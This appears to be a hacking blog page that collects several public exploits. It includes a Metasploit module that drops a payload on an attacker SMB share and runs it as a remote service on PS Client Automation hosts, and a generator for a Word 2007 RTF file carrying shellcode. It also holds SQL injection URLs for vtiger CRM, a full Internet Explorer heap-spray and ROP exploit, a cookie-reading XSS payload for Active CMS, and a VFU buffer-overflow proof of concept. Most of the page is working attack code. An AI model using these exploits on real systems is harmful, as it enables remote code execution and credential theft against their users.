Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863126165

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	# Exploit mixins should be called first
	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::EXE	
	include Msf::Auxiliary::Report

	# Aliases for common classes
	SIMPLE = Rex::Proto::SMB::Client
	XCEPT  = Rex::Proto::SMB::Exceptions
	CONST  = Rex::Proto::SMB::Constants


	def initialize
		super(
			'Name'        => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
			'Description' => %Q{
				This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. 
			},
			'Author'         => [ 'Ben Turner' ],
			'License'        => BSD_LICENSE,
			'References'  =>
				[
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'WfsDelay'     => 10,
					'EXITFUNC' => 'process'
				},
			'Payload'     => { 'BadChars' => '', 'DisableNops' => true },
			'Platform'    => ['win'],
			'Targets'         =>
				[
					[ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}]
				],
			'DefaultTarget'   => 0,
			'DisclosureDate' => 'January 10 2014'
		)

		register_options([
			OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']),
			OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']),
			Opt::RPORT(3465),
		], self.class)

	end

	def exploit

		createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
		createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\""
		createservice << "\x22\x00\x00\x00"

                startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
                startservice << "Nvdkit service start test"
                startservice << "\x22\x00\x00\x00"

		removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
		removeservice << "Nvdkit service remove test"
		removeservice << "\x22\x00\x00\x00"

		def filedrop()
			begin
				origrport = self.datastore['RPORT']
				self.datastore['RPORT'] = 445
				origrhost = self.datastore['RHOST']
				self.datastore['RHOST'] = self.datastore['SMBServer']
				connect()
				smb_login()
				print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...")
				self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
				exe = generate_payload_exe
				fd = smb_open("\\installservice.exe", 'rwct')
				fd << exe
				fd.close

				self.datastore['RPORT'] = origrport
				self.datastore['RHOST'] = origrhost
			
			rescue Rex::Proto::SMB::Exceptions::Error => e
				print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")	
				abort()
			end
		end

		def filetest()
			begin
				origrport = self.datastore['RPORT']
				self.datastore['RPORT'] = 445
				origrhost = self.datastore['RHOST']
				self.datastore['RHOST'] = self.datastore['SMBServer']
				connect()
				smb_login()
				print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
				self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
				file = "\\installservice.exe"
				filetest = smb_file_exist?(file)
				if filetest
					print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n")
				else
					print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!")
						
				end

				self.datastore['RPORT'] = origrport
				self.datastore['RHOST'] = origrhost
			
			rescue Rex::Proto::SMB::Exceptions::Error => e
				print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")	
				abort()
			end
		end

		begin
			filedrop()
			filetest()
			connect()
			sock.put(createservice)
			print_status("Creating the callback payload and installing the remote service")
			disconnect
			sleep(5)
			connect()
			sock.put(startservice)
                        print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service")
			disconnect
			sleep(30)
			connect
			sock.put(removeservice)
			disconnect

		rescue ::Exception => e
			print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n")	
			abort()
		
		end
	end
end
            
# Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass
# Date : 28/02/2015 
# Author : R-73eN
# Software : Microsoft Office Word 2007 
# Tested : Windows 7 Starter


import sys
# Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode .
shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7'
#filecontent
content="{\\rtf1"
content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}"
content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par"
content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par"
content+="{\\object\\objocx"
content+="{\\*\\objdata"
content+="\n"
content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000"
content+="00000000000000000E0000"
content+="\n"
content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000"
content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF"
content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400"
content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000"
content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628"
content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00"
content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000"
content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF"
content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000"
content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF"
content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000"
content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000"
content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000"
content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400"
content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600"
content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080"
content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974"
content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000"
content+="000000000000"
content+= 'cb818278'# Address=788281CB jmp esp |  {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll)
content+="9090909090909090" #nops
content+= shellcode
#junk
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000"
content+="\n"
content+="}"
content+="}"
content+="}"
banner = "\n\n"
banner +="  ___        __        ____                   _    _  \n"  
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __        / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \      / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |    / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_|[] /_/   \_\_____|\n\n"
print banner
if(len(sys.argv) < 2):
	print '\n Usage : exploit.py filename.rtf'
else:
	filename = sys.argv[1]
	f=open(filename,"w")
	f.write(content)
	f.close()
	print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'
            
source: https://www.securityfocus.com/bid/49948/info

vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4-- 
            
source: https://www.securityfocus.com/bid/49964/info

Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability.

Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. 

<html>
<head>
</head>

<body>


<script type="text/javascript">
<!--

//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";

var newstack,newstackaddr;
var fakeobj;

var spray,spray2,selarray,readindex,readaddr,optarryaddr;
var elms = new Array();

var optarray;

var mshtmlbase;

//option object that is to be corrupted
var corruptedoption;
var corruptedoptionaddr;
var corruptaddr;

function strtoint(str) {
    return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

function inttostr(num) {
    return String.fromCharCode(num%65536,Math.floor(num/65536));
}

function crash() {
    var o = new Option();
    selarray[99].options.add(o,-0x20000000);
}

function readmem(addr) {
    if(addr < readaddr) alert("Error, can't read that address");
    return strtoint(spray[readindex].substr((addr-readaddr)/2,2));
}

function readmem2(addr,size) {
    if(addr < readaddr) alert("Error, can't read that address");
    return spray[readindex].substr((addr-readaddr)/2,size/2);
}

function overwrite(addr) {
    try {
        var index = (addr-optarryaddr)/4 - 0x40000000;
        selarray[99].options.add(optarray.pop(),index);
    } catch(err) {}   
}

function getreadaddr() {
    readaddr = 0;
    var indexarray = new Array();
    var tmpaddr = 0;
    var i,index;
    
    index = readmem(tmpaddr);
    indexarray.push(index);
    
    while(1) {
        tmpaddr += 0x100000;
        index = readmem(tmpaddr);
        for(i=0;i<indexarray.length;i++) {
            if(indexarray[i]==index+1) {
                readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
                return 1;
            } else if(indexarray[i]==index-1) {
                readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
                return 1;               
            }
        }
        indexarray.push(index);
    }
}

//leverages the vulnerability into memory disclosure
function initread() {
    //overwrite something in a heap spray slide
    try {
        selarray[99].options.add(optarray.pop(),-100000000/4);
    } catch(err) {}
    
    //now find what and where exectly did we overwrite
    readindex = -1;
    var i;
    for(i=1;i<200;i++) {
        if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2))
{
            readindex = i;
            break;
        }
    }

    if(readindex == -1) {
        alert("Error overwriring first spray");
        return 0;
    }

    var start=2,len=spray[readindex].length-2,mid;
    while(len>10) {
        mid = Math.round(len/2);
        mid = mid - mid%2;
        if(spray[readindex].substr(start,mid) !=
spray[readindex-1].substr(start,mid)) {
            len = mid;
        } else {
            start = start+mid;
            len = len-mid;
            //if(spray[readindex].substr(start,mid) ==
spray[readindex-1].substr(start,mid)) alert("error");
        }
    }
    
    for(i=start;i<(start+20);i=i+2) {
        if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
            break;
        }
    }
    
    //overwrite the string length
    try {
        selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1);
    } catch(err) {}
       
    if(spray[readindex].length == spray[readindex-1].length) alert("error
overwriting string length");
    
    //readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24;
    getreadaddr();
    
    optarryaddr = readaddr + 100000000 + i*2;

    return 1;   
}

function trysploit() {
    //create some helper objects
    for(var i =0; i < 100; i++) {
        elms.push(document.createElement('div'));
    }

    //force the option cache to rebuild itself
    var tmp1 = selarray[99].options[70].text;

    //overwrite the CTreeNode pointer
    overwrite(corruptaddr);
    //read the address of the option object we overwrited with
    var optadr = readmem(corruptaddr);
    //delete the option object...
    selarray[99].options.remove(0);
    
    CollectGarbage();
    
    //...and allocate some strings in its place
    for(var i = 0; i < elms.length; i++) {
        elms[i].className = fakeobj;
    }

    //verify we overwrote the deleted option object successfully
    if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;

    alert("success, calc.exe should start once you close this message box");

    //now do something with the corrupted option object
    corruptedoption.parentNode.click();
}

function hs() {
    
    //first heap spray, nop slide + shellcode   
    spray = new Array(200);
    var pattern = unescape("%u0C0C%u0C0C");
    while(pattern.length<(0x100000/2)) pattern+=pattern;
    pattern = pattern.substr(0,0x100000/2-0x100);
    for(var i=0;i<200;i++) {
        spray[i] = [inttostr(i)+pattern+scode].join("");
    }

    //fill small gaps, we wan everything _behind_ our heap spray so that
we can read it
    var asmall = new Array(10000);
    pattern = "aaaa";
    while(pattern.length<500) pattern+=pattern;
    for(var i=0;i<10000;i++) {
        asmall[i]=[pattern+pattern].join("");
    }
    
    //create some select and option elements
    selarray = new Array(100);
    for(var i=0;i<100;i++) {
        selarray[i] = document.createElement("select");
        for(var j=0;j<100;j++) {
            var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
            selarray[i].options.add(o,0);
        }
    }
    
    //create some extra option elements
    optarray = new Array(10000);
    for(var i=0;i<10000;i++) {
        optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
    }
    
    //enable memory disclosure
    if(initread()==0) return;

    //force the option cache to rebuild itself
    var tmp1 = selarray[99].options[60].text;
    
    //get the address of some option element to be corrupted, also remove
it from its select element, we don't want anything else messing with
it
    corruptedoptionaddr = readmem(optarryaddr+60*4);
    corruptedoption = selarray[99].options[60];
    selarray[99].options.remove(60);
    
    //get the base address of mshtml.dll based on the vtable address
inside the option object
    mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0;
    alert("base address of mshtml.dll : " + mshtmlbase.toString(16));

    //we'll overwrite the pointer to the CTreeNode object, compute its address
    corruptaddr = corruptedoptionaddr+0x14;

    //second heap-spray, this one will act as a stack (we'll exchange
stack pointer with a pointer into this)
    spray2 = new Array(200);   

    //some address that is likely to be inside the "stack"
    newstackaddr = optarryaddr+100000000;
    newstackaddr-=newstackaddr%0x1000;
    newstackaddr+=0x24;

    //assemble the "stack" so that it calls VirtualProtect on the firs
shellcode and then jumps into it through return-oriented-programming
    newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F);
    while(newstack.length<(0x1000/2))
newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA");
    newstack = newstack.substr(0,0x1000/2);
    while(newstack.length<(0x100000/2)) newstack+=newstack;
    newstack = newstack.substr(0,0x100000/2-0x100);
    for(var i=0;i<200;i++) {
        spray2[i] = [newstack].join("");
    }
    
    //constract a fake object which will replace a deleted option object
(it has to be the same size)
    //fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    
    //loop until we either achieve command execution or fail
    for(var i=0;i<100;i++) {
        trysploit();
    }
    
    alert("Exploit failed, try again");

}


hs();


-->
</script>


</body>
</html>
            
source: https://www.securityfocus.com/bid/50001/info

Active CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Active CMS 1.2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/activecms/admin/admin?action=module&mod=&#039;<script>alert(document.cookie)</script>
            
# Exploit Title: VFU Move Entry Buffer Overflow
# Date: 2015-02-25
# Exploit Author: Bas van den Berg -- @barrebas
# Vendor Homepage: http://cade.datamax.bg/
# Software Link: http://cade.datamax.bg/vfu/#download
# Version: 4.10-1.1
# Tested on: GNU/Linux Kali 1.09 32-bit & Crunchbang 11 Waldorf (based on Debian Wheezy), kernel 3.2.0-4

# VFU 4.10 (probably up to 4.14) contains a buffer overflow when a user
# moves a file entry around with a large filename. To trigger this 
# vulnerability, extensive user interaction is required.
# Steps to reproduce the bug: create a file with a large (>115 
# characters), run VFU and select 'A' and then 'V' to move the large 
# file entry around. Upon confirming the entry move, VFU crashes due to 
# a buffer overflow in this function:

'''
void vfu_file_entry_move()
{
  char t[128];
  sprintf( t, "MOVE/REORDER File entry: %s", files_list[FLI]->name() );
  say1( t );
  say2( "Use Up/Down Arrows to reorder, ESC,ENTER when done." );
'''

# This overflow allows execution of arbitrary commands with the 
# privilege of the current user. The attached PoC demonstrates this. It 
# drops two files: the large filename and a shellscript that allows 
# arbitrary command execution. Usage: $ python vfu-move-entry-poc.py


import struct
import os

def p(x):
	return struct.pack('<L', x & 0xffffffff)

with open('./vstring.h', 'w') as f:
	f.write('#!/bin/sh\ntouch pwned')
	f.close()
os.chmod('./vstring.h', 0755)

payload = "A"*115
payload += p(0x8049ca0) # system@plt
payload += p(0x804a260) # exit@plt
payload += p(0x8088e44) # -> ./vstring.h

open(payload, 'w').close()
            
